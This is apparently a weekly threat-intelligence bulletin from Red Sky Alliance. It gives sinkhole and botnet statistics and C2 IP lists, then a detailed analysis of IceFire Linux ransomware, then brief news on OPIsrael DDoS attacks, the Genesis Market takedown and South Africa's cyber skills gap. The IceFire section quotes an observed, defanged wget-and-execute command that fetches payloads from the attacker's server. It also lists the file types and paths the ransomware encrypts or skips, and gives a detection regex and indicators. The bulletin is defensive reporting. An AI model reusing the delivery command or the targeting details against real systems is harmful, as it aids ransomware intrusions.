11021940094?profile=RESIZE_400xActivity Summary - Week Ending on 6 April 2023:

  • Red Sky Alliance identified 27,743 connections from new IP’s checking in with our Sinkholes
  • Contabo GmbH in Germany hit 58x
  • 10 ‘new’ Botnets hits
  • 202,557 ‘new’ Sinkhole hits
  • IceFire Ransomware  
  • OPIsrael
  • Genesis Market Takedown
  • South African Woes

 Red Sky Alliance Compromised (C2) IP’s 

IP

Contacts

185.215.180.76

73

176.111.173.153

53

89.248.165.204

51

5.188.86.230

43

20.241.40.18

36

185.215.180.76 was reported 58 times. Confidence of Abuse is 79%  ISP: Contabo GmbH;  Usage Type:  Data Center/Web:  Hosting/Transit;  Hostname(s):  vmi1145721.contaboserver.net;  Domain Name:  contabo.com;  Country:  Germany, City: Munich, Bayern
https://www.abuseipdb.com/check/185.215.180.76

 

Red Sky Alliance Malware Activity   

On 5 April 2023, Red Sky Alliance identified 27,743 connections from new unique IP addresses, which are checking in with one of the many Red Sky Alliance sinkholed domains.

Malware Variant

Times Seen

sality

24294

corkow

1874

sykipot

385

betabot

293

shiz

285

Top 5 Malware Variant and number of contacts.  Sality and Corkow has consistently remain the top variants. 
Sykipot follows.

 

 

 For a full black list – contact analysts: info@redskyalliance.com

Red Sky Alliance Botnet Tracker

On 5 April 2023, analysts identified 10 new IP addresses participating in various botnets (call for full .csv Blacklists, below are only a small sampling of botnet trackers).  We are currently upgrading this collection.

First_ Seen

Botnet Attribution

Infected Host’s IPv4 Address

2023-04-03T13:08:11

SOCKS4 proxy|port: 8888

23.236.65.229

2023-03-30T16:08:06

SOCKS4 proxy|port: 1081

43.155.81.198

2023-04-03T13:08:06

HTTP proxy|port: 83

43.249.224.172

2023-04-03T13:08:13

HTTP proxy|port: 83

43.249.224.174

2023-04-03T13:08:21

SOCKS4 proxy|port: 34432

43.250.81.155

 

Red Sky Alliance Sinkhole Traffic / Last 30 days

Sinkhole Traffic – Red Sky Alliance run a proprietary sinkhole and collect indicators from known former malicious domains.  This data is proprietary and not available from any other source.

 11021934284?profile=RESIZE_584x

MALICIOUS CYBER TRENDS:

IceFire - SentinelLabs recently observed a novel Linux version of the IceFire ransomware being deployed in mid-February against enterprise networks.  The iFire file extension is associated with known reports of IceFire, a ransomware family noted by MalwareHunterTeam in March 2022.

Prior to this report, IceFire had only shown a Windows-centric focus.  The attackers’ tactics are consistent with those of the ‘big-game hunting’ (BGH) ransomware families, which involve double extortion, targeting large enterprises, using numerous persistence mechanisms, and evading analysis by deleting log files.  Previous reports indicate that IceFire targeted technology companies; SentinelLabs observed these recent attacks against organizations in the media and entertainment sector. IceFire has impacted victims in Turkey, Iran, Pakistan, and the United Arab Emirates, which are typically not a focus for organized ransomware actors.[1]

Technical Analysis - The IceFire Linux version (SHA-1: b676c38d5c309b64ab98c2cd82044891134a9973) is a 2.18 MB, 64-bit ELF binary compiled with gcc for AMD64 architecture.  Analysts tested the sample on Intel-based distributions of Ubuntu and Debian; IceFire ran successfully on both test systems.  In observed intrusions, the Linux version was deployed against CentOS hosts running a vulnerable version of IBM Aspera Faspex file server software. The system downloaded two payloads using wget and saves them to /opt/aspera/faspex:

sh -c rm -f demo iFire && wget hxxp[://]159.65.217.216:8080/demo && wget hxxp[://]159.65.217.216:8080/{redacted_victim_server}/iFire && chmod +x demo && ./demo

On execution, files are encrypted and renamed with the “.ifire” extension appended to the file name. IceFire then deletes itself by removing the binary, which is evident in the picture below.


11021934659?profile=RESIZE_584xFiles on the user desktop of a Debian system before and after running IceFire

The “.iFire” extension is appended to the file name. IceFire skipped the files with “.sh” and “.cfg” extensions.


11021935692?profile=RESIZE_584xA file with the CPP extension that was encrypted by IceFire

Excluded Files & Folders - The sample contains data segment references to a list of file extensions.  These extensions are excluded from encryption, as they pertain to executables, application or system functionality.  In the case of .txt and .pid, encrypting these files potentially impedes the ransomware functionality.

.cfg.o.sh.img.txt.xml.jar.pid.ini.pyc.a.so.run.env.cache.xmlb

The following file extensions are targeted for encryption:

.sample .pack .idx .bitmap .gzip .bundle .rev .war .7z .3ds .accdb .avhd .back .cer .ctl .cxx .dib .disk .dwg .fdb .jfif .jpe .kdbx .nrg .odc .odf .odg .odi .odm .odp .ora .ost .ova .ovf .p7b .p7c .pfx .pmf .ppt .qcow .rar .tar .tib .tiff .vbox .vcb .vdi .vfd .vhd .vhdx .vmc .vmdk .vmsd .vmtm .vsdx .vsv .work .xvd .vswp .nvram .vmxf .vmem .vmsn .vmss .wps .cad .mp4 .wmv .rm .aif .pdf .doc .docx .eml .msg .mail .rtf .vbs .c .cpp .cs .pptx .xls .xlsx

IceFire ransomware doesn’t encrypt all files on Linux: it avoids encrypting certain paths, so that critical parts of the system are not encrypted and remain operational.  In one observed infection, the /srv directory was encrypted, so these exclusions can be selectively overridden.

Folder

Description

/boot

Data used at startup

/dev

Device files, drivers

/etc

System configuration files

/lib

Shared libraries used by applications or system for dynamically-linked functionality

/proc

Virtual filesystem used by Linux to store runtime system information like PIDs, mounted drives, system configuration, etc.

/srv

Web server directories

/sys

Interface to the kernel; similar to /proc

/usr

User-level binaries and static data

/var

Dynamic data, e.g. caches, databases

/run

System information, including PID files; cleared on each reboot

 

During Sentenal’s analysis, the user profile directory at /home/[user_name]/ saw the most encryption activity. IceFire targets user and shared directories (e.g., /mnt, /media, /share) for encryption; these are unprotected parts of the file system that do not require elevated privileges to write or modify.

Interestingly, several file sharing clients downloaded benign encrypted files after IceFire had encrypted the file server’s shared folders.  Despite the attack on the server, clients were still able to download files from the encrypted server.  This implies the IceFire developer made thoughtful choices in the excluded paths and file extensions.

IceFire Linux Payload Delivery & Infrastructure - IceFire for Windows is delivered through phishing messages and pivoting using post-exploitation frameworks.  The Linux variant is in its infancy, though our observations indicate it was deployed using an exploit for CVE-2022-47986, a recently patched vulnerability in IBM’s Aspera Faspex file sharing software.

IceFire payloads are hosted on a DigitalOcean droplet at 159.65.217.216 with the following URL format:

  • hxxp[://]159.65.217.216:8080/(subdomain.domain.TLD|IP_Address)/iFire

The following regular expression can be used to detect IceFire payload URLs. Consider wildcarding the Digital Ocean IP address in case the actors pivot to a new delivery IP or domain.

  • http:\/\/159\.65\.217\.216:8080\/(([a-z]+\.){2}([a-z]+)|^((25[0-5]|(2[0-4]|1\d|[1-9]|)\d)\.?\b){4})\/iFire

Open-source intelligence platforms revealed a history of Aspera Faspex activity on IP address 159.65.217.216, including:

  • Other payload URLs with “aspera” in the secondary hostname section of the URI
  • Session cookie name: _aspera_faspex_session
  • Service fingerprinting indexed a vulnerable version of Aspera Faspex software

Notable Findings - As of this writing, the IceFire binary was detected by 0/61 VirusTotal engines.  Notably, this sample contains many statically linked functions from the legitimate OpenSSL library, contributing to the relatively large file size.  The binary contains the following hardcoded RSA public key:

-----BEGIN RSA PUBLIC KEY-----

MIIBCgKCAQEA0lImq1tu0GPOv0cj78WMTeI+l9Coo0U5VtXj1/13Hds3HVXL5K3+\nZYn/ygsTmRByTU/ZvwoWPqozH4N+RTj0W3MG6KSew1n2duKIkBiexMDN+Ip/qP2w\nFadqimzD/OuBhTwh6LrhX6YVtu9rrpCbhmcsobUurChql0+EOItH/NRL1PpbkDPP\nc0pdChRcv9OQ0Hbz9xsFYnfchqLswzyq2CnuUu+ihjLcIwNd4FsYS+Zw9OCH0gnE\nj6AQgWr0y831JkHRFSEq24DXIXyZD2JZ1Rnts3i/zLSgalop47QeV9DIXOgBGxxK\ndvO6XAEBWx9cYMEk2oTvk50y8/U41+5GFQIDAQAB

-----END RSA PUBLIC KEY-----

In a cryptographic logging function, the binary contains an embedded path referencing the Desktop for a user named “Jhone.”  The .cnf extension potentially refers to a configuration file.  The relic was near the end of the OpenSSL functionality; it is possible that the OpenSSL package contained this artifact and is not necessarily the ransomware developer.

11021935289?profile=RESIZE_584xFunction for writing a log file to user Jhone’s Desktop

Ransom Notes

IceFire drops the ransom note from an embedded resource in the binary and writes it to each directory targeted for file encryption. The ransom note contains a hardcoded username and password that are required to log into the ransom payment portal hosted on a Tor hidden service at 7kstc545azxeahkduxmefgwqkrrhq3mzohkzqvrv7aekob7z3iwkqvyd[.]onion.

11021935859?profile=RESIZE_584xLinux version of IceFire ransom note

The Linux version’s Onion hostname matches the hostname that ransomware trackers tie to IceFire, including attacks targeting Windows.


11021936077?profile=RESIZE_584xIceFire ransom login page

11021935885?profile=RESIZE_584xIceFire victim leaks page

Conclusion - This evolution for IceFire fortifies that ransomware targeting Linux continues to grow in popularity through 2023.  While the groundwork was laid in 2021, the Linux ransomware trend accelerated in 2022 when illustrious groups added Linux encryptors to their arsenal, including the likes of  BlackBasta, Hive, Qilin, Vice Society aka HelloKitty, and others.  In comparison to Windows, Linux is more difficult to deploy ransomware against–particularly at scale. Many Linux systems are servers: typical infection vectors like phishing or drive-by download are less effective.  To overcome this, actors turn to exploiting application vulnerabilities, as the IceFire operator demonstrated by deploying payloads through an IBM Aspera vulnerability.

Indicators of Compromise

SHA-1: b676c38d5c309b64ab98c2cd82044891134a9973

Payload URLs: hxxp[://]159.65.217.216:8080/demo

 

GLOBAL TRENDS:   

OPIsrael - One of Israel's largest cyber-security companies, Check Point, was taken down by a group of hackers calling themselves "Anonymous Sudan" on 4 April afternoon.  However, after a short while, the website seemed to return to operating as normal.  Earlier in the day, the websites of multiple major universities in Israel were also attacked by the same group and were down for several hours.  Among the websites unavailable for browsing were the sites of Tel Aviv University, the Hebrew University of Jerusalem, Ben-Gurion University of the Negev, Haifa University, Weizmann Institute of Science, Open University of Israel and Reichman University.

Statement from the Check Point spokesperson:  "All our sites are functioning well despite a large-scale attack on them," Check Point's spokesperson said in a statement.  "The company's website is protected against DDoS (Distributed Denial of Service) attacks at the highest level. [It is] one of the strongest websites in the world.  The hackers used a huge amount of requests [in order to] affect - for a few minutes, the ability to reach the site. Thanks to [our] protections, the site works as usual and was not damaged by the attack."

11021938873?profile=RESIZE_584xThe hacker group's statement:  The hacker group published a statement on its Telegram account, listing the sites it attacked. "Infrastructure: Universities - Israel education sector has been dropped Because [sic] of what they did in Palestine," the statement read.  The group also added that this wasn't its main attack, which will occur on April 7. It is not clear if the attack also penetrated into the institutions' systems.

This attack is part of a campaign called OPIsrael, in which activists try to attack targets on the Israeli internet, according to Ynet News.  Some of the sites attacked earlier this week are now available again.  "These are service-preventing attacks, those that only bring down websites and do not steal information and that can be recovered from relatively easily.  However, it can be assumed that these groups are trying to produce more significant attacks, including ransom attacks and data theft," cyber security firm Check Point said. According to Check Point, the Anonymous group also shortly attacked websites related to several medical centers, including Rambam Hospital in Haifa. However, the hospital denied the attack.[2]

US, Genesis Market Take Down - The FBI and Department of Justice said on Wednesday that investigators were able to take down the cybercrime platform Genesis Market after identifying and locating its backend servers.  Globally, almost 120 people have been arrested just 24 hours on from the takedown on Tuesday of one of the world’s largest facilitators of online fraud.[3]

11021938898?profile=RESIZE_400xThe login pages of all three of Genesis Market’s clear web domains were replaced by a splash page on 4 April informing users that the domain was now in the control of the FBI.  These three domains were included on the US Treasury’s sanctions list, which identified Genesis Market as being based in Russia, alongside a dark web .onion site that the criminal platform also used. 

The law enforcement action was described as “an unprecedented takedown of a major criminal marketplace that enabled cybercriminals to victimize individuals, businesses, and governments around the world,” by the US Attorney General.  Officials said the investigation was ongoing.

Genesis Market functioned as a one-stop shop for criminals by selling both stolen credentials and the tools to weaponize that data.  Law enforcement officials believe its administrators made more than $8.7 million since founding the site in 2018.  It was unique in providing a web browser that criminals could use to import stolen credentials so they could impersonate victims — including IP addresses, session cookies, operating system information and plugins.

South Africa - Forty percent (40%) of South African companies struggle to hire and retain cyber security talent, and 64% agree that the shortage of cyber security skills creates additional cyber risks for organizations.  This is according to cyber security firm Fortinet’s 2023 Global Cybersecurity Skills Gap report, which found that in the past 12 months, 39% of South African organizations suffered breaches that cost over US $1 million to remediate.[4]

In addition, 86% indicated they had experienced more than one cyber-attack that could be partially attributed to a lack of cyber security skills on their teams.  Fortinet says many short-staffed cyber security teams are burdened and strained as they try to keep up with thousands of daily threat alerts and attempt to manage disparate solutions to properly protect their organization’s devices and data.  Fortinet, says a cyber security workforce gap jeopardizes the most foundational functions of the profession such as risk assessment, oversight and critical systems patching. 

The Cybersecurity Workforce Study released by global information security-focused non-profit organization (ISC)² which found that 70% of respondents feel their organization does not have enough cyber security staff to be effective.  This study estimates that 3.4 million professionals are needed to fill the worldwide cyber security workforce gap. The EMEA region requires 317 050 professionals.11021939280?profile=RESIZE_400x

Tech certification – The Fortinet research shows that 94% of South African companies prefer to hire talent with a technology-focused certification, but 78% indicated they are struggling to find people with this certification.  “94% are willing to pay for employees to acquire certification,” it adds.  One way to reduce this gap is to establish more authorized training centers and academic partner programs in high schools, colleges and universities.  Organizations are also looking to tap into new talent pools, with 8 out of 10 respondents having diversity goals as part of their hiring practices.

The EVP of products and CMO at Fortinet, says, “The cyber security talent shortage is one of the top challenges putting organizations at risk…  In today’s climate, organizations must choose products that introduce automation to offload overworked teams while continuing to focus on upskilling and cyber security training.” 

[1] https://www.sentinelone.com/labs/icefire-ransomware-returns-now-targeting-linux-enterprise-networks/

[2] https://www.jpost.com/breaking-news/article-736351

[3] https://krebsonsecurity.com/2023/04/fbi-seizes-bot-shop-genesis-market-amid-arrests-targeting-operators-suppliers/

[4] https://www.msn.com/en-za/news/other/south-africa-under-pressure-to-fill-cyber-security-skills-gap/ar-AA19xD10

Topics by Tags

Monthly Archives